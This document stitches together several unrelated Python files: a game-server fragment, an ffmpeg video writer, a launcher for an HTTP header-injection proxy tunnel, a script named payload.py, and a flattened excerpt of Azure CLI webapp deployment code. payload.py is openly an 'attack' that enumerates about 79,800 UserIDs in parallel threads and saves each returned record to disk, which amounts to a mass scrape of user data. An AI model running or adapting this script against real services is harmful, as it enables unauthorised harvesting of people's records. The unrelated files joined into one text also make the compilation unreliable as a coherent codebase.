            return True
        print("Rejecting new conn")
        error_message = self.lurk.get_err_message(2)
        self.lurk.encode(error_message, conn = conn)
        return False

    def add_player(self, action):
        ### Checks availability of name or innactive Player object, creates/updates Player or responds with error message ###
        # NOTE(review): self.client_queue is never assigned in __init__ —
        # this method would raise AttributeError as written; presumably it
        # predates router_queue. Confirm intended queue.
        name, character_dict = action
        print(f'Adding character: {name}')
        with Session() as s:
            player = s.query(Character).filter_by(name = name).first()
            if player:
                self.players[name].alive = True
                self.players[name].set_flags(character_dict['flags'])
                self.players[name].health = 100
            else:
                self.players[name] = Character(character_dict = character_dict) #Player(self, conn, character_dict = character_dict)
        accept_message = self.lurk.get_accept_message(10)
        self.client_queue.put((name, accept_message))
        approved_character = self.lurk.get_char_message(self.players[name].get_dict())
        self.client_queue.put((name, approved_character))
utils.py
import os
from glob import glob
from subprocess import Popen, PIPE
from datetime import datetime
from threading import Thread

from notifications import send_sms


def delete_files():
    """Delete every file whose name starts with OUTPUT_FILE_PREFIX."""
    pattern = os.environ['OUTPUT_FILE_PREFIX'] + '*'
    for path in glob(pattern):
        os.remove(path)


class VideoWriter(object):
    """Streams JPEG frames into an ffmpeg subprocess to produce an mp4."""

    def __init__(self, *args, **kwargs):
        # Lazily created on the first frame; None means "not recording".
        self.ffmpeg_process = None

    def initialize_ffmpeg(self):
        """Spawn an ffmpeg process that reads JPEG frames from stdin."""
        timestamp = datetime.now().strftime('%Y-%m-%d-%H-%M-%s')
        self.video_filename = '{}_{}.mp4'.format(os.environ['OUTPUT_FILE_PREFIX'], timestamp)
        command = [
            'ffmpeg',
            '-y',                    # overwrite output without asking
            '-f', 'image2pipe',      # read a stream of images from stdin
            '-vcodec', 'mjpeg',
            '-r', '24',
            '-i', '-',
            '-vcodec', 'mpeg4',
            '-q', '5',
            '-fs', '590000',         # cap output file size
            '-r', '24',
            self.video_filename,
        ]
        self.ffmpeg_process = Popen(command, stdin=PIPE, stdout=PIPE)

    def start_recording(self, frame):
        """Feed one JPEG frame to ffmpeg, starting the process if needed."""
        if self.ffmpeg_process is None:
            self.initialize_ffmpeg()
        try:
            pipe = self.ffmpeg_process.stdin
            pipe.write(frame)
            pipe.flush()
        except BrokenPipeError:
            # ffmpeg exited (e.g. hit the -fs size cap); finalize the file.
            self.finish_recording()

    def finish_recording(self):
        """Close ffmpeg's stdin so it finalizes the mp4, then notify via SMS."""
        process = self.ffmpeg_process
        if process and not process.stdin.closed:
            process.stdin.close()
            self.ffmpeg_process = None
            Thread(target=send_sms, args=(self.video_filename,)).start()
main.py
#qpy:console
import sys
import time
import random
import threading
import ServerInfo
import ServerConfig
import ServerPinger
import ServerHandler

# Decode bytes to unicode, silently dropping invalid UTF-8 (Python 2 idiom).
ru = lambda text: text.decode('utf-8', 'ignore')

class Server:
    """Console front-end: prints the banner and configuration dump, then
    runs the HTTP proxy service plus a background pinger."""

    def __init__(self):
        # Base width used when drawing section header rules.
        self.long = 8
        self.sets = ServerConfig.Sets()
        # Static metadata provided by the ServerInfo module.
        self.name = ServerInfo.Info('name').get_info()
        self.ver = ServerInfo.Info('ver').get_info()
        self.form = ServerInfo.Info('about').get_info()
        self.auth = ServerInfo.Info('by').get_info()
        self.mail = ServerInfo.Info('mail').get_info()
        self.remode = ServerInfo.Info('remode').get_info()
        self.conf = ServerConfig.conf
        # Display lookup tables indexed by the integer settings in self.sets.
        self.noyes = [ru('No'), ru('Yes')]
        self.version = [ru('Default'), ru('HTTP/1.0'), ru('HTTP/1.1')]
        self.method = [ru('HEAD'), ru('GET'), ru('POST'), ru('DELETE'), ru('CONNECT'), ru('OPTIONS'), ru('TRACE'), ru('PUT')]
        # Literal backslash sequences (shown to the user, not real newlines).
        self.line = [ru('\\r\\n'), ru('\\n')]
        self.split = [ru('Default'), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE)), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE)), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE)), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE)), ru('%s' % (self.line[self.sets.ILINE] * self.sets.ILINE))]

    def subs(self, data = '', cut = False):
        # Render a config value: empty/falsy -> 'None'; cut=True truncates
        # long values to 5 characters plus an ellipsis.
        if data:
            data = data
        else:
            data = 'None'
        if cut:
            if len(data) > 5:
                data = '%s...' % data[:5]
        return data

    def about(self, title = ''):
        # Build the "About" banner as a single unicode string.
        self.info = []
        self.info.append('[ %s ]%s\n' % (title, '=' * (self.long - len(title) - 5)))
        self.info.append('Name : %s\n' % self.name)
        self.info.append('Version : %s\n' % self.ver)
        self.info.append('Dev : %s\n' % self.auth)
        self.info.append('Email : %s\n' % self.mail)
        self.info.append('Remode : %s\n' % self.remode)
        self.info.append('\n\n')
        return ru(''.join(self.info))

    def config(self, title = ''):
        # Build the full configuration dump shown at startup.
        self.info = []
        self.info.append('[ %s ]%s\n' % (title, '=' * (self.long - len(title) - 5)))
        self.info.append('Config File :\n')
        self.info.append('- %s\n' % self.conf)
        self.info.append('Local Host :\n')
        self.info.append('- %s\n' % self.sets.LHOST)
        self.info.append('Local Port :\n')
        self.info.append('- %s\n' % str(self.sets.LPORT))
        self.info.append('HTTP Query :\n')
        self.info.append('- Front Query : %s\n' % self.subs(self.sets.FQUERY))
        self.info.append('- Middle Query : %s\n' % self.subs(self.sets.MQUERY))
        self.info.append('- Back Query : %s\n' % self.subs(self.sets.BQUERY))
        self.info.append('- Reverse Query : %s\n' % self.subs(self.sets.RQUERY))
        self.info.append('- Inject Query : %s\n' % self.subs(self.sets.IQUERY))
        self.info.append('- Inject Method : %s\n' % self.method[self.sets.IMETHOD])
        self.info.append('- Inject Newline : %s\n' % self.line[self.sets.ILINE])
        self.info.append('- Inject Splitline : %s\n' % self.split[self.sets.ISPLIT])
        self.info.append('- Remove Port : %s\n' % self.noyes[self.sets.RPORT])
        self.info.append('- Remove Path : %s\n' % self.noyes[self.sets.RPATH])
        self.info.append('- Url Replacer : %s\n' % self.subs(self.sets.CQUERY))
        self.info.append('- Request Version : %s\n' % self.version[self.sets.RHTTP])
        self.info.append('- Advanced Mode : %s\n' % self.noyes[self.sets.ADMODE])
        self.info.append('HTTP Header :\n')
        self.info.append('- Custom Header 1 : %s\n' % self.subs(self.sets.CUSHDR0))
        self.info.append('- Header Value 1 : %s\n' % self.subs(self.sets.VALHDR0))
        self.info.append('- Custom Header 2 : %s\n' % self.subs(self.sets.CUSHDR1))
        self.info.append('- Header Value 2 : %s\n' % self.subs(self.sets.VALHDR1))
        self.info.append('- Custom Header 3 : %s\n' % self.subs(self.sets.CUSHDR2))
        self.info.append('- Header Value 3 : %s\n' % self.subs(self.sets.VALHDR2))
        self.info.append('- Custom Header 4 : %s\n' % self.subs(self.sets.CUSHDR3))
        self.info.append('- Header Value 4 : %s\n' % self.subs(self.sets.VALHDR3))
        self.info.append('Server Config :\n')
        self.info.append('- Keep Server : %s\n' % self.subs(self.sets.KEEP))
        self.info.append('- HTTPS Connection : %s\n' % self.noyes[self.sets.RHTTPS])
        self.info.append('- Tunnel Proxy : %s\n' % self.noyes[self.sets.PTYPE])
        self.info.append('- Server Buffer : %s\n' % str(self.sets.SBUFF))
        self.info.append('- Connection Timeout : %s\n' % str(self.sets.TIMEOUT))
        self.info.append('Proxy Host :\n')
        self.info.append('- %s\n' % self.subs(self.sets.PHOST))
        self.info.append('Proxy Port :\n')
        self.info.append('- %s\n' % str(self.sets.PPORT))
        self.info.append('\n\n')
        return ru(''.join(self.info))

    def log(self, title = ''):
        # Build the log section header.
        # NOTE(review): '' * n is always the empty string — about()/config()
        # use '=' * n here; confirm whether a rule was intended.
        self.info = []
        self.info.append(' %s %s\n' % (title, '' * (self.long - len(title) - 5)))
        self.info.append('\n\n')
        return ru(''.join(self.info))

    def show(self):
        # Print banner, config and log header to stderr with small pauses.
        sys.stderr.write(self.about('About'))
        time.sleep(1)
        sys.stderr.write(self.config('Configuration'))
        time.sleep(2)
        sys.stderr.write(self.log('========Inject Sukses======== \nReading Server:'))

    def run(self):
        # Open the log window, then block serving the HTTP proxy.
        ServerHandler.LogWindow(True)
        ServerHandler.HTTPProxyService().serve_forever()

    def pinger(self):
        # Keep-alive: ping at a random interval between 30s and 5 minutes.
        while 1:
            time.sleep(random.randint(30, 300))
            ServerPinger.Pinger().check()

if __name__ == '__main__':
    Server().show()
    # NOTE(review): run/pinger are bound on two *new* Server instances,
    # distinct from the one used by show(); confirm that is intended.
    services = [threading.Thread(target=Server().run, args=()), threading.Thread(target=Server().pinger, args=())]
    for serving in services:
        serving.start()
payload.py
import threading, requests

# Highest UserID to fetch; worker threads each cover a 1000-ID slice.
END_NUM = 79800
URL = ""  # target endpoint; must be filled in before running


def attack(x, y):
    """Fetch the record for every UserID in [x, y) and append each response
    body to a per-range text file named '<x>to<y>.txt'.

    A response body of exactly 90 characters is treated as a transient
    failure page and the request is retried until a different-sized body
    comes back.
    """
    filename = str(x) + "to" + str(y) + ".txt"
    # Open the output file once for the whole range instead of re-opening
    # and closing it on every iteration; the context manager guarantees the
    # handle is closed even if a request raises.
    with open(filename, "a+") as f:
        for i in range(x, y):
            PARAMS = {'UserID': i}
            r = requests.get(url=URL, params=PARAMS)
            # Retry while the server returns the known 90-char error page.
            while len(r.text) == 90:
                r = requests.get(url=URL, params=PARAMS)
                print("Retrying ID : ", i)
            f.write(r.text)


if __name__ == "__main__":
    threads = []
    for i in range(0, END_NUM, 1000):
        # First slice starts at 1 (UserID 0 is skipped).
        t = threading.Thread(target=attack, args=((1 if i == 0 else i), (i + 1000)))
        threads.append(t)
        t.start()
    for t in threads:
        t.join()
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- import ast import threading import time from urllib.parse import urlparse from urllib.request import urlopen from binascii import hexlify from os import urandom import datetime import json import ssl import sys import uuid from functools import reduce import invoke from nacl import encoding, public import OpenSSL.crypto from fabric import Connection from knack.prompting import prompt_pass, NoTTYException, prompt_y_n from knack.util import CLIError from knack.log import get_logger from msrestazure.azure_exceptions import CloudError from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id from azure.mgmt.storage import StorageManagementClient from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient from azure.mgmt.relay.models import AccessRights from azure.mgmt.web.models import KeyInfo from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory from azure.cli.command_modules.network._client_factory import network_client_factory from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.cli.core.commands import LongRunningOperation from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \ ConfiguredDefaultSetter, sdk_no_wait, get_file_json from azure.cli.core.util import get_az_user_agent, send_raw_request from azure.cli.core.profiles import ResourceType, get_sdk from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError, CLIInternalError, UnclassifiedUserFault, AzureResponseError, 
AzureInternalError, ArgumentUsageError) from .tunnel import TunnelServer from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory from ._appservice_utils import _generic_site_operation, _generic_settings_operation from .utils import (_normalize_sku, get_sku_name, retryable_method, raise_missing_token_suggestion, _get_location_from_resource_group, _list_app, _rename_server_farm_props, _get_location_from_webapp, _normalize_location, get_pool_manager) from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details, check_resource_group_exists, set_location, get_site_availability, get_profile_username, get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use, detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name) from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD, LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH) from ._github_oauth import (get_github_access_token) logger = get_logger(__name__) # pylint:disable=no-member,too-many-lines,too-many-locals # region "Common routines shared with quick-start extensions." 
# Please maintain compatibility in both interfaces and functionalities" def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master', deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None, multicontainer_config_type=None, multicontainer_config_file=None, tags=None, using_webapp_up=False, language=None, assign_identities=None, role='Contributor', scope=None, vnet=None, subnet=None): from azure.mgmt.web.models import Site SiteConfig, SkuDescription, NameValuePair = cmd.get_models( 'SiteConfig', 'SkuDescription', 'NameValuePair') if deployment_source_url and deployment_local_git: raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git') docker_registry_server_url = parse_docker_image_name(deployment_container_image_name) client = web_client_factory(cmd.cli_ctx) if is_valid_resource_id(plan): parse_result = parse_resource_id(plan) plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name']) else: plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name) if not plan_info: raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name)) is_linux = plan_info.reserved node_default_version = NODE_EXACT_VERSION_DEFAULT location = plan_info.location # This is to keep the existing appsettings for a newly created webapp on existing webapp name. name_validation = get_site_availability(cmd, name) if not name_validation.name_available: if name_validation.reason == 'Invalid': raise CLIError(name_validation.message) logger.warning("Webapp '%s' already exists. 
The command will use the existing app's settings.", name) app_details = get_app_details(cmd, name) if app_details is None: raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that " "the app is a part of the current subscription".format(name)) current_rg = app_details.resource_group if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()): raise CLIError("The webapp '{}' exists in resource group '{}' and does not " "match the value entered '{}'. Please re-run command with the " "correct parameters.". format(name, current_rg, resource_group_name)) existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings') settings = [] for k, v in existing_app_settings.properties.items(): settings.append(NameValuePair(name=k, value=v)) site_config = SiteConfig(app_settings=settings) else: site_config = SiteConfig(app_settings=[]) if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1', 'B1', 'B2', 'B3', 'BASIC']: site_config.always_on = True if subnet or vnet: subnet_info = _get_subnet_info(cmd=cmd, resource_group_name=resource_group_name, subnet=subnet, vnet=vnet) _validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location, subnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"]) _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"], vnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"], subnet_name=subnet_info["subnet_name"]) site_config.vnet_route_all_enabled = True subnet_resource_id = subnet_info["subnet_resource_id"] else: subnet_resource_id = None webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags, https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id) helper = _StackRuntimeHelper(cmd, client, 
linux=is_linux) if runtime: runtime = helper.remove_delimiters(runtime) current_stack = None if is_linux: if not validate_container_app_create_options(runtime, deployment_container_image_name, multicontainer_config_type, multicontainer_config_file): raise CLIError("usage error: --runtime | --deployment-container-image-name |" " --multicontainer-config-type TYPE --multicontainer-config-file FILE") if startup_file: site_config.app_command_line = startup_file if runtime: match = helper.resolve(runtime) if not match: raise CLIError("Linux Runtime '{}' is not supported." " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime)) match['setter'](cmd=cmd, stack=match, site_config=site_config) elif deployment_container_image_name: site_config.linux_fx_version = _format_fx_version(deployment_container_image_name) if name_validation.name_available: site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE", value="false")) elif multicontainer_config_type and multicontainer_config_file: encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file) site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type) elif plan_info.is_xenon: # windows container webapp if deployment_container_image_name: site_config.windows_fx_version = _format_fx_version(deployment_container_image_name) # set the needed app settings for container image validation if name_validation.name_available: site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME", value=docker_registry_server_user)) site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD", value=docker_registry_server_password)) site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL", value=docker_registry_server_url)) elif runtime: # windows webapp with runtime specified if any([startup_file, deployment_container_image_name, 
multicontainer_config_file, multicontainer_config_type]): raise CLIError("usage error: --startup-file or --deployment-container-image-name or " "--multicontainer-config-type and --multicontainer-config-file is " "only appliable on linux webapp") match = helper.resolve(runtime) if not match: raise CLIError("Windows runtime '{}' is not supported. " "Please invoke 'az webapp list-runtimes' to cross check".format(runtime)) match['setter'](cmd=cmd, stack=match, site_config=site_config) # TODO: Ask Calvin the purpose of this - seems like unneeded set of calls # portal uses the current_stack propety in metadata to display stack for windows apps current_stack = get_current_stack_from_runtime(runtime) else: # windows webapp without runtime specified if name_validation.name_available: # If creating new webapp site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION", value=node_default_version)) if site_config.app_settings: for setting in site_config.app_settings: logger.info('Will set appsetting %s', setting) if using_webapp_up: # when the routine is invoked as a help method for webapp up if name_validation.name_available: logger.info("will set appsetting for enabling build") site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True)) if language is not None and language.lower() == 'dotnetcore': if name_validation.name_available: site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK', value='https://{}.scm.azurewebsites.net/detectors' .format(name))) poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def) webapp = LongRunningOperation(cmd.cli_ctx)(poller) # TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed if current_stack: _update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack) # Ensure SCC operations follow right after the 'create', no precedent 
appsetting update commands _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url, deployment_source_branch, deployment_local_git) _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name) if deployment_container_image_name: logger.info("Updating container settings") update_container_settings(cmd, resource_group_name, name, docker_registry_server_url, deployment_container_image_name, docker_registry_server_user, docker_registry_server_password=docker_registry_server_password) if assign_identities is not None: identity = assign_identity(cmd, resource_group_name, name, assign_identities, role, None, scope) webapp.identity = identity return webapp def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location): vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks vnet_location = vnet_client.get(resource_group_name=subnet_resource_group, virtual_network_name=vnet_name).location vnet_location = _normalize_location(cmd, vnet_location) asp_location = _normalize_location(cmd, webapp_location) if vnet_location != asp_location: raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. " "vnet location: {}. Plan location: {}.".format(vnet_location, asp_location)) def _get_subnet_info(cmd, resource_group_name, vnet, subnet): from azure.cli.core.commands.client_factory import get_subscription_id subnet_info = {"vnet_name": None, "subnet_name": None, "resource_group_name": None, "subnet_resource_id": None, "subnet_subscription_id": None, "vnet_resource_id": None} if is_valid_resource_id(subnet): if vnet: logger.warning("--subnet argument is a resource ID. 
Ignoring --vnet argument.") parsed_sub_rid = parse_resource_id(subnet) subnet_info["vnet_name"] = parsed_sub_rid["name"] subnet_info["subnet_name"] = parsed_sub_rid["resource_name"] subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"] subnet_info["subnet_resource_id"] = subnet subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"] vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}" subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"], parsed_sub_rid["resource_group"], parsed_sub_rid["name"]) return subnet_info subnet_name = subnet if is_valid_resource_id(vnet): parsed_vnet = parse_resource_id(vnet) subnet_rg = parsed_vnet["resource_group"] vnet_name = parsed_vnet["name"] subscription_id = parsed_vnet["subscription"] subnet_info["vnet_resource_id"] = vnet else: logger.warning("Assuming subnet resource group is the same as webapp. " "Use a resource ID for --subnet or --vnet to use a different resource group.") subnet_rg = resource_group_name vnet_name = vnet subscription_id = get_subscription_id(cmd.cli_ctx) vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}" subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id, subnet_rg, vnet) subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}" subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name) subnet_info["vnet_name"] = vnet_name subnet_info["subnet_name"] = subnet_name subnet_info["resource_group_name"] = subnet_rg subnet_info["subnet_resource_id"] = subnet_rid subnet_info["subnet_subscription_id"] = subscription_id return subnet_info def validate_container_app_create_options(runtime=None, deployment_container_image_name=None, multicontainer_config_type=None, multicontainer_config_file=None): if bool(multicontainer_config_type) != bool(multicontainer_config_file): return False 
opts = [runtime, deployment_container_image_name, multicontainer_config_type] return len([x for x in opts if x]) == 1 # you can only specify one out the combinations def parse_docker_image_name(deployment_container_image_name): if not deployment_container_image_name: return None non_url = "/" not in deployment_container_image_name non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name) if non_url: return None parsed_url = urlparse(deployment_container_image_name) if parsed_url.scheme: return parsed_url.hostname hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname return "https://{}".format(hostname) def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None): if not settings and not slot_settings: raise CLIError('Usage Error: --settings |--slot-settings') settings = settings or [] slot_settings = slot_settings or [] app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) result, slot_result = {}, {} # pylint: disable=too-many-nested-blocks for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]: for s in src: try: temp = shell_safe_json_parse(s) if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command for t in temp: if 'slotSetting' in t.keys(): slot_result[t['name']] = t['slotSetting'] if setting_type == "SlotSettings": slot_result[t['name']] = True result[t['name']] = t['value'] else: dest.update(temp) except CLIError: setting_name, value = s.split('=', 1) dest[setting_name] = value result.update(dest) for setting_name, value in result.items(): app_settings.properties[setting_name] = value client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_application_settings', app_settings, slot, client) 
    app_settings_slot_cfg_names = []
    if slot_result:
        # Keep the slot-configuration-names list in sync with the requested sticky flags.
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
        # Slot settings logic to add a new setting(s) or remove an existing setting(s)
        for slot_setting_name, value in slot_result.items():
            if value and slot_setting_name not in slot_cfg_names.app_setting_names:
                slot_cfg_names.app_setting_names.append(slot_setting_name)
            elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
                slot_cfg_names.app_setting_names.remove(slot_setting_name)
        app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)

    return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)


def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
                              share_name, access_key, mount_path=None, slot=None, slot_setting=False):
    """Add a new Azure Files/Blob mount configuration to a webapp; fails if the id already exists."""
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    if custom_id in azure_storage_accounts.properties:
        raise CLIError("Site already configured with an Azure storage account with the id '{}'. 
" "Use 'az webapp config storage-account update' to update an existing " "Azure storage account configuration.".format(custom_id)) azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name, share_name=share_name, access_key=access_key, mount_path=mount_path) client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts, slot, client) if slot_setting: slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or [] if custom_id not in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.append(custom_id) client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None, share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False): AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue') azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) existing_account_config = azure_storage_accounts.properties.pop(custom_id, None) if not existing_account_config: raise CLIError("No Azure storage account configuration found with the id '{}'. 
" "Use 'az webapp config storage-account add' to add a new " "Azure storage account configuration.".format(custom_id)) new_account_config = AzureStorageInfoValue( type=storage_type or existing_account_config.type, account_name=account_name or existing_account_config.account_name, share_name=share_name or existing_account_config.share_name, access_key=access_key or existing_account_config.access_key, mount_path=mount_path or existing_account_config.mount_path ) azure_storage_accounts.properties[custom_id] = new_account_config client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts, slot, client) if slot_setting: slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or [] if custom_id not in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.append(custom_id) client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None): client = web_client_factory(cmd.cli_ctx) app = client.web_apps.get(resource_group_name, name) if app is None: raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. 
'
                       'Please make sure these values are correct.'.format(name, resource_group_name))
    parse_plan_id = parse_resource_id(app.server_farm_id)
    plan_info = None
    retry_delay = 10  # seconds
    # We need to retry getting the plan because sometimes if the plan is created as part of function app,
    # it can take a couple of tries before it gets the plan
    for _ in range(5):
        plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
                                                 parse_plan_id['name'])
        if plan_info is not None:
            break
        time.sleep(retry_delay)

    is_consumption = is_plan_consumption(cmd, plan_info)
    # Linux (reserved) Consumption apps without remote build deploy via storage upload.
    if (not build_remote) and is_consumption and app.reserved:
        return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
    if build_remote and app.reserved:
        add_remote_build_app_settings(cmd, resource_group_name, name, slot)
    elif app.reserved:
        remove_remote_build_app_settings(cmd, resource_group_name, name, slot)

    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)


def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Zip-deploy a webapp (thin wrapper over enable_zip_deploy)."""
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)


def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Push a local zip to the Kudu zipdeploy endpoint and poll the async deployment status."""
    logger.warning("Getting scm site credentials for zip deployment")
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)

    try:
        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    except ValueError:
        raise CLIError('Failed to fetch scm url for function app')

    # isAsync=true makes Kudu return 202 immediately; status is polled separately.
    zip_url = scm_url + '/api/zipdeploy?isAsync=true'
    deployment_status_url = scm_url + '/api/deployments/latest'

    import urllib3
    authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    headers = authorization
    headers['Content-Type'] = 'application/octet-stream'
    headers['Cache-Control'] = 'no-cache'
    headers['User-Agent'] = get_az_user_agent()

    import requests
    import os
    from azure.cli.core.util import should_disable_connection_verify
    # 
Read file content
    with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
        zip_content = fs.read()
        logger.warning("Starting zip deployment. This operation can take a while to complete ...")
        res = requests.post(zip_url, data=zip_content, headers=headers,
                            verify=not should_disable_connection_verify())
        logger.warning("Deployment endpoint responded with status code %d", res.status_code)

    # check the status of async deployment
    if res.status_code == 202:
        response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
                                                authorization, timeout)
        return response

    # check if there's an ongoing process
    if res.status_code == 409:
        raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
                                    "WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
                                    "WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
                                    "appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
                                    "MySubscription' to list app settings and 'az webapp config appsettings delete "
                                    "--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
                                    "to delete them.".format(deployment_status_url))

    # check if an error occured during deployment
